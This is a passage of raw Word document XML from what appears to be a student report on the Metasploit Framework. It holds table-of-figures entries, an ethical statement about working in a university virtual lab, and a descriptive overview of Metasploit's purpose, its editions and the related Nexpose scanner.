            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FC98B47" w14:textId="63985F9D" w:rsidR="001C68CE" w:rsidRDefault="00000000" w:rsidP="0057177A">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc150072438" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22 - Windows 10 PC sending Acknowledgements to the Attacker's PC for Packet 5998</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc150072438 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67FAEB1E" w14:textId="51F11655" w:rsidR="002A0D88" w:rsidRDefault="005A6F5C" w:rsidP="0057177A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C76AE" w14:textId="77777777" w:rsidR="002A0D88" w:rsidRDefault="002A0D88" w:rsidP="00325578">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>List of Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C0E3A" w14:textId="7CE301EB" w:rsidR="00603060" w:rsidRDefault="005A6F5C">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof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50084812" w:history="1">
        <w:r w:rsidR="00603060" w:rsidRPr="0018507F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 1-MSF Interfaces [3] [4]</w:t>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc150084812 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00603060">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39FA809E" w14:textId="263F3B13" w:rsidR="00603060" w:rsidRDefault="00603060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150084813" w:history="1">
        <w:r w:rsidRPr="0018507F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2- MSF Modules [1] [4] [6]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_Toc150084813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A24F40E" w14:textId="160D0446" w:rsidR="00603060" w:rsidRDefault="00603060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150084814" w:history="1">
        <w:r w:rsidRPr="0018507F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 3 - Mitigation Items to prevent or assist with a cybersecurity attack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_Toc150084814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24A41635" w14:textId="56B3A1F0" w:rsidR="005A6F5C" w:rsidRDefault="005A6F5C" w:rsidP="002A0D88">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339934A" w14:textId="77777777" w:rsidR="004331D6" w:rsidRDefault="004331D6" w:rsidP="00467048">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F651C8">
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB0B5C" w14:textId="77777777" w:rsidR="00E46F05" w:rsidRDefault="00E46F05" w:rsidP="00F540B4"/>
    <w:p w14:paraId="1B550F9C" w14:textId="6E9D0A8F" w:rsidR="00A90F45" w:rsidRDefault="00A90F45" w:rsidP="00A20886">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ethical Statement: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B032A" w14:textId="23DF719F" w:rsidR="00F540B4" w:rsidRDefault="00F540B4" w:rsidP="00A20886">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As</w:t>
      </w:r>
      <w:r w:rsidR="008513E5">
        <w:t xml:space="preserve"> required all Me</w:t>
      </w:r>
      <w:r w:rsidR="00CC6D71">
        <w:t xml:space="preserve">tasploit </w:t>
      </w:r>
      <w:r w:rsidR="002A0F00">
        <w:t>lab work</w:t>
      </w:r>
      <w:r w:rsidR="00CC6D71">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46F05">
        <w:t xml:space="preserve">contained in this document </w:t>
      </w:r>
      <w:r w:rsidR="00CC6D71">
        <w:t xml:space="preserve">has been carried out </w:t>
      </w:r>
      <w:r w:rsidR="00E064DF">
        <w:t>within the Virtual Environment lab</w:t>
      </w:r>
      <w:r w:rsidR="00BC6C9B">
        <w:t>, abiding by t</w:t>
      </w:r>
      <w:r w:rsidR="00E064DF">
        <w:t xml:space="preserve">he University of Wales Trinity St David (UWTSD) </w:t>
      </w:r>
      <w:r w:rsidR="00BC6C9B">
        <w:t>Acceptable Use Policy (AUP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7832085A" w14:textId="0DD7E74B" w:rsidR="009665D7" w:rsidRDefault="00205630" w:rsidP="00A20886">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="000A0A6E">
        <w:t>he Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidR="009E6367">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>has so many facets to it</w:t>
      </w:r>
      <w:r w:rsidR="00592D90">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00ED6E4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6367">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00592D90">
        <w:t>would be</w:t>
      </w:r>
      <w:r w:rsidR="009E6367">
        <w:t xml:space="preserve"> impossible to </w:t>
      </w:r>
      <w:r w:rsidR="00F036D5">
        <w:t xml:space="preserve">capture </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F036D5">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F036D5">
        <w:t xml:space="preserve"> the capabilities of this tool in a</w:t>
      </w:r>
      <w:r w:rsidR="00592D90">
        <w:t xml:space="preserve"> single</w:t>
      </w:r>
      <w:r w:rsidR="00F036D5">
        <w:t xml:space="preserve"> brief report.  </w:t>
      </w:r>
      <w:r w:rsidR="00102A0E">
        <w:t>Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="00F036D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C862A5">
        <w:t xml:space="preserve">it has been attempted to highlight the main features and capabilities of this </w:t>
      </w:r>
      <w:r w:rsidR="00D67BD2">
        <w:t>very powerful pen testing tool</w:t>
      </w:r>
      <w:r w:rsidR="00A20886">
        <w:t xml:space="preserve"> in the following report</w:t>
      </w:r>
      <w:r w:rsidR="00D67BD2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F036D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0086733F">
        <w:t>The report also contains the results of the Bind Shell lab which was successfully completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60872710" w14:textId="77777777" w:rsidR="00BC6C9B" w:rsidRPr="00F540B4" w:rsidRDefault="00BC6C9B" w:rsidP="00F540B4"/>
    <w:p w14:paraId="12D44AC3" w14:textId="77777777" w:rsidR="004331D6" w:rsidRDefault="004331D6" w:rsidP="00467048">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overview of Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D55C9" w14:textId="77777777" w:rsidR="00190C55" w:rsidRDefault="00190C55" w:rsidP="00190C55"/>
    <w:p w14:paraId="619FC0AB" w14:textId="7BD8CD86" w:rsidR="009F176D" w:rsidRDefault="009F176D" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00BE34E6">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Framework (MSF) is regarded as an </w:t>
      </w:r>
      <w:r w:rsidR="00102A0E">
        <w:t>open-source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cybersecurity auditing tool for Pen testers and ethical hackers, of course this framework can also be used for nefarious purposes.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40B70C" w14:textId="608BF059" w:rsidR="00B352F7" w:rsidRDefault="003E64C7" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="00DD084E">
        <w:t xml:space="preserve">was developed by Rapid 7 </w:t>
      </w:r>
      <w:r w:rsidR="00B352F7">
        <w:t xml:space="preserve">that describe their product as </w:t>
      </w:r>
      <w:r w:rsidR="00BE34E6">
        <w:t>a: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C24197" w14:textId="0C287717" w:rsidR="001F58C1" w:rsidRPr="00B27A6B" w:rsidRDefault="001F58C1" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B27A6B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Penetration testing software for offensive security teams.” </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:id w:val="-1747190147"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rap23 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="67D150D0" w14:textId="4C084B5C" w:rsidR="006769BF" w:rsidRPr="00190C55" w:rsidRDefault="006769BF" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>It could be seen as counter</w:t>
      </w:r>
      <w:r w:rsidR="00BE34E6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">productive to develop a tool that could be used by malicious hackers to attack systems using their software.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C1533" w14:textId="23A11076" w:rsidR="00A86C54" w:rsidRDefault="003C5CD5" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The purpose of the Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="00E73C42">
        <w:t xml:space="preserve">can be summed up in following comment by </w:t>
      </w:r>
      <w:r w:rsidR="00312586">
        <w:t xml:space="preserve">Jason Leitner, Vulnerability Management Engineer at the Brady </w:t>
      </w:r>
      <w:r w:rsidR="004A119F">
        <w:t>Corporation: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C160F" w14:textId="6820DF1D" w:rsidR="004D7B8D" w:rsidRDefault="00E73C42" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B27A6B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“With Nexpose and Metasploit, we saw a 70% decrease in vulnerabilities over the course of a year.</w:t>
      </w:r>
      <w:r w:rsidR="00312586" w:rsidRPr="00B27A6B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B27A6B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> That really helps us move the business forward.”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:id w:val="514116785"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rap23 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C">
            <w:rPr>
              <w:i/>
              <w:iCs/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidRPr="00B27A6B">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="5A2900FA" w14:textId="27D88833" w:rsidR="003062B2" w:rsidRDefault="003062B2" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Nexpose </w:t>
      </w:r>
      <w:r w:rsidR="005E185E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A33FB4">
        <w:t xml:space="preserve">which is </w:t>
      </w:r>
      <w:r w:rsidR="005E185E">
        <w:t xml:space="preserve">sometimes written as NeXpose) </w:t>
      </w:r>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidR="00421E6D">
        <w:t xml:space="preserve"> mentioned in the above quote is a vulnerability scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also developed by Rapid 7</w:t>
      </w:r>
      <w:r w:rsidR="00646F41">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="004D042D">
        <w:t xml:space="preserve">Nexpose is available as a paid for produce </w:t>
      </w:r>
      <w:r w:rsidR="005107A0">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="004D042D">
        <w:t xml:space="preserve"> is called just Nexpose, or as a free </w:t>
      </w:r>
      <w:r w:rsidR="007F5756">
        <w:t xml:space="preserve">product called Nexpose Community. </w:t>
      </w:r>
      <w:r w:rsidR="00183C1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009779DF">
        <w:t>It appears t</w:t>
      </w:r>
      <w:r w:rsidR="00183C1B">
        <w:t>hat</w:t>
      </w:r>
      <w:r w:rsidR="00B66E67">
        <w:t xml:space="preserve"> the Nexpose vulnerability scanner</w:t>
      </w:r>
      <w:r w:rsidR="00183C1B">
        <w:t xml:space="preserve"> can be integrated with Metasploit Pro</w:t>
      </w:r>
      <w:r w:rsidR="009F233A">
        <w:t xml:space="preserve"> both of which </w:t>
      </w:r>
      <w:r w:rsidR="008A5CD8">
        <w:t>need to be</w:t>
      </w:r>
      <w:r w:rsidR="009F233A">
        <w:t xml:space="preserve"> paid for </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1107169841"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="009F233A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009F233A">
            <w:instrText xml:space="preserve"> CITATION Rap7Nx \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009F233A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="009F233A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A33FB4">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03855EB7" w14:textId="7E5DC4C6" w:rsidR="008D57E9" w:rsidRDefault="004A119F" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="008D57E9">
        <w:t xml:space="preserve"> the mindset behind developing this </w:t>
      </w:r>
      <w:r w:rsidR="0057052A">
        <w:t xml:space="preserve">software is to </w:t>
      </w:r>
      <w:r>
        <w:t>improve</w:t>
      </w:r>
      <w:r w:rsidR="00CF6A83">
        <w:t xml:space="preserve"> cybersecurity by </w:t>
      </w:r>
      <w:r w:rsidR="00265E48">
        <w:t xml:space="preserve">giving engineers the opportunity to </w:t>
      </w:r>
      <w:r w:rsidR="00E00A13">
        <w:t xml:space="preserve">test </w:t>
      </w:r>
      <w:r w:rsidR="00E97C0A">
        <w:t xml:space="preserve">and examine </w:t>
      </w:r>
      <w:r w:rsidR="00E00A13">
        <w:t xml:space="preserve">exploits </w:t>
      </w:r>
      <w:r w:rsidR="00E97C0A">
        <w:t xml:space="preserve">so that </w:t>
      </w:r>
      <w:r w:rsidR="00B96B8B">
        <w:t xml:space="preserve">a solution can be put in place before the </w:t>
      </w:r>
      <w:r w:rsidR="00E00A13">
        <w:t>systems</w:t>
      </w:r>
      <w:r w:rsidR="00265E48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B96B8B">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00AF28A5">
        <w:t>targeted</w:t>
      </w:r>
      <w:r w:rsidR="00B96B8B">
        <w:t xml:space="preserve"> in a real live </w:t>
      </w:r>
      <w:r w:rsidR="00AF28A5">
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00E00A13">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B318825" w14:textId="3ECDD787" w:rsidR="004C4742" w:rsidRDefault="004C4742" w:rsidP="00190C55">
      <w:r>
        <w:t>Metasp</w:t>
      </w:r>
      <w:r w:rsidR="00A771BB">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oit is available in </w:t>
      </w:r>
      <w:r w:rsidR="000B5413">
        <w:t>three</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A5218">
        <w:t>editions</w:t>
      </w:r>
      <w:r w:rsidR="001A2D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="80349124"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A2D9E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A2D9E">
            <w:instrText xml:space="preserve"> CITATION RapMetEd \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A2D9E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="001A2D9E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1628703128"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00964A7F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00964A7F">
            <w:instrText xml:space="preserve"> CITATION OffBC \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00964A7F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00964A7F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="008A5218">
        <w:t xml:space="preserve">:- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC957F" w14:textId="706C93E2" w:rsidR="008A5218" w:rsidRDefault="008A5218" w:rsidP="0089393F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22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089393F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit Framework (Free to use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB56EF" w14:textId="75B45AF1" w:rsidR="00964A7F" w:rsidRPr="0089393F" w:rsidRDefault="00964A7F" w:rsidP="0089393F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Metasploit Express </w:t>
      </w:r>
      <w:r w:rsidR="006439C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(Paid for Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3479622A" w14:textId="5E356C57" w:rsidR="008A5218" w:rsidRDefault="008A5218" w:rsidP="0089393F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22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089393F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Pro (Paid for </w:t>
      </w:r>
      <w:r w:rsidR="0089393F" w:rsidRPr="0089393F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF62255" w14:textId="77777777" w:rsidR="00A771BB" w:rsidRDefault="00A771BB" w:rsidP="00A771BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295F2460" w14:textId="77777777" w:rsidR="001C68CE" w:rsidRDefault="001C68CE" w:rsidP="00A771BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E97AA91" w14:textId="48B70995" w:rsidR="0018265A" w:rsidRDefault="00A771BB" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidR="004A119F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>expected,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> there are many more features to the Pro version that is aimed </w:t>
      </w:r>
      <w:r w:rsidR="00E874BF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">at Professional </w:t>
      </w:r>
      <w:r w:rsidR="00D36DFC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>penetration (aka pen)</w:t>
      </w:r>
      <w:r w:rsidR="00E874BF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing companies.  </w:t>
      </w:r>
      <w:r w:rsidR="00CE7369">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Some of the additional features </w:t>
      </w:r>
      <w:r w:rsidR="0018265A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that come with Pro</w:t>
      </w:r>
      <w:r w:rsidR="00CE7369">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A119F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>include: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63AE85" w14:textId="7CF0B000" w:rsidR="00A771BB" w:rsidRDefault="0018265A" w:rsidP="00442CC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
